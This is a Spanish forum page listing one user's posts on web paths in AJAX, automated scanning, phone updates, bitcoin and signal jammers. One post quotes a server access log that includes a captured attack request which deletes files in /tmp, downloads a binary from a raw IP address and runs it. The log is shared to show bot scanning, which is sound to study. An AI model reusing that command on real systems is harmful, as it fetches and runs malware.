Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el-brujo

#951
jajajaja muy buena #!drvy xD

proteus8 recuerda que Ajax y javascript los interpreta el navegador, entonces las rutas deben ser URL'S no una ruta path (del directorio, sistema de ficheros).

/var/www/cga/public/js no es una URL válida  :P
#952
Cita de: #!drvy en 19 Diciembre 2020, 17:22 PM
Esto es más que común. Son escaners automatizados que se dedican a probar vulnerabilidades conocidas. Pasa lo mismo por SSH... nada más levantes un servidor (asignarle IP) ya tienes intentos de login.

Saludos

Eso mismo creo yo, son automatizados en busca de nuevas víctimas...

Ya, el Fail2ban no para de trabajar con SSH. Los intentos fallidos de conexión por SSH son todavía más escandalosos... Me parece que llevaba 143 en pocos días.

Un día me dió por mirar las estadísticas de wp-login.php de un WordPress y la cantidad de intentos de entrar era también alarmante. Sobretodo alguna ip que hacía cada día miles de intentos xD
#953
Instalo un servidor web nuevo sin contenido, ni nada y a los pocos minutos ya recibo peticiones maliciosas xD

Citar85.93.182.254 - - [14/Dec/2020:12:55:09 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
68.150.109.112 - - [14/Dec/2020:12:58:24 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1" 404 196 "-" "Hello, world"
200.160.123.172 - - [14/Dec/2020:12:59:19 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.236.61 - - [14/Dec/2020:13:13:59 +0100] "GET / HTTP/1.1" 200 481 "-" "Mozilla/5.0 zgrab/0.x"
207.180.140.98 - - [14/Dec/2020:13:29:51 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.237.198 - - [14/Dec/2020:13:34:45 +0100] "\x16\x03\x01" 400 226 "-" "-"
151.233.51.20 - - [14/Dec/2020:13:39:55 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:26 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
123.115.60.33 - - [14/Dec/2020:13:55:27 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
192.241.238.100 - - [14/Dec/2020:13:56:04 +0100] "\x16\x03\x01" 400 226 "-" "-"
94.102.59.99 - - [14/Dec/2020:14:00:20 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
222.117.123.238 - - [14/Dec/2020:14:13:16 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
220.81.245.117 - - [14/Dec/2020:15:23:00 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:06 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.33.42 - - [14/Dec/2020:15:57:59 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:00 +0100] "\x16\x03\x01" 400 226 "-" "-"
108.162.215.115 - - [14/Dec/2020:15:59:26 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.35.46 - - [14/Dec/2020:15:59:29 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:01:35 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.255.59 - - [14/Dec/2020:16:02:24 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:03:22 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.112 - - [14/Dec/2020:16:05:27 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:05 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:10 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:11 +0100] "\x16\x03\x01\x02" 400 226 "-" "-"
172.69.135.89 - - [14/Dec/2020:16:06:43 +0100] "\x16\x03\x01" 400 226 "-" "-"
162.158.166.52 - - [14/Dec/2020:16:07:44 +0100] "\x16\x03\x01" 400 226 "-" "-"
172.69.34.229 - - [14/Dec/2020:16:08:41 +0100] "\x16\x03\x01" 400 226 "-" "-"
165.227.4.106 - - [14/Dec/2020:16:10:34 +0100] "GET / HTTP/1.0" 200 481 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.57.122.212 - - [14/Dec/2020:16:14:03 +0100] "GET /index.php?s=/index/ hink" 400 226 "-" "-"


Creo que será interesante publicar el  log de mod_security del servidor web para ver la cantidad inhumana de peticiones.
#954
En Google (Gmail) puedes revisar acceso de aplicaciones de terceros ( mira en Seguridad --> el acceso a tus datos a aplicaciones de riesgo)

¿Dónde aparece que eres Developer?

La verdad, cuesta bastante entender tu mensaje, o te explicas mejor y pones ejemplos o es imposible ayudarte.
#955
Citarurl:'../resources/views/system/post1.php', // esta es la ruta que no me funciona

¿No hay definido ningún rootpath?

   /   = Root directory
   .   = This location
   ..  = Up a directory
   ./  = Current directory
   ../ = Parent of current directory
   ../../ = Two directories backwards


Ejemplos para arreglarlo:
https://stackoverflow.com/questions/4213620/jquery-ajax-url
#956
Me recordó al tema de usar inhibidores de señal y jammers. Existir, existen y funcionan, pero no pasa uso personal.

Desde el punto de vista legal, la regulación deja claro que su uso está regulado y muy restringido a determinados ámbitos y organismos, como las Fuerzas y Cuerpos de Seguridad del Estado. Quizá algunos hayáis podido comprobar cómo deja de funcionar la llave electrónica del coche cerca de las casas cuartel de la Guardia Civil.

Citarlos usuarios de a pie no debemos usar inhibidores de frecuencia en España, al igual que en la mayor parte del mundo

Inhibidores de señal Wifi: inhabilita cámaras y drones cerca de tu casa
https://blog.elhacker.net/2015/09/inhibidores-de-senal-wifi-gsm-inhabilita-camara-drones.html
#957
CitarTodo lo que son actualizaciones (siempre que pueda) está en modo manual; no quiero que me mangoneen.
Veréis que curioso.

¿en modo manual? ¿Qué quiere decir eso?

Un teléfono de hace 5 años, ya es un poco viejo. Hoy en día no duran tanto.

No sé que navegador utilizas, pero vaya, es recomendable no usar el predeterminado del sistema y usar firefox o chrome actualizados?

¿Cómo sabes que el SMS lo manda movistar? ¿El remitente pone Movistar? xD Yo creo que el mensaje es falso.

CitarQuieren colarme mediante una actualización código que haga inservible el teléfono, para después venderme otro.

Si, eres mal pensado. Primero de todo actualizar el navegador no hace inservible el teléfono.

Apple si fue demandada por ralentizar los iPhones, pero Android no.

Si no has actualizado Android en 5 años tu teléfono es inseguro y potencialmente vulnerable.... Muy vulnerable. La cantidad de actualizaciones de seguridad de Wifi, Bluetooth que hay, te asustarías.

Lógicamente cuando instalas obstaculizaciones de seguridad el teléfono va más lento, pero qué remedio hay.
#958
Un crecimiento de más del 5,5% durante las últimas 24 horas y más del 170% en lo que llevamos de año.


El bitcoin supera la barrera de los 20.000 dólares por primera vez en su historia


La famosa criptomoneda alcanzó su valor máximo y ha triplicado su precio desde principios de año. Sin embargo, muchos expertos e inversionistas consideran que el bitcoin sigue teniendo mucha volatilidad.



Desde principios de año el bitcoin ha subido cerca de un 190%, impulsado por el interés de inversores tradicionales que desconfiaban antes de esta criptomoneda. Pero el precio empezó realmente a dispararse a fines de octubre por el lanzamiento de un servicio de compra, venta y pago por criptomoneda del gigante de pagos Paypal. Desde entonces esta criptomoneda ha ganado más de un 40%
#959
Citarsobre generar ingresos sin hacer nada

Eso. por desgracia no existe. Déjame que te cuente un secreto: Es un engaño.

En el foro se eliminarán los enlaces que sean un engaño y no porque sean SPAM.

Si la página no es tuya y quieres preguntar sobre si es un engaño.

En tu caso tu usuario no parece un robot de spam  :P
#960
Redes / Re: conexiones en netstat
15 Diciembre 2020, 15:54 PM
Citar¿Qué es bufer del control transmisión?

Todas las preguntas que estás haciendo tienen fácil solución buscando en Google...

buscas en Google "búfer del control de transmisión" y te lo explica todo.

https://es.wikipedia.org/wiki/Protocolo_de_control_de_transmisi%C3%B3n

Lee algo sobre el protocolo TCP/IP antes de seguir preguntando.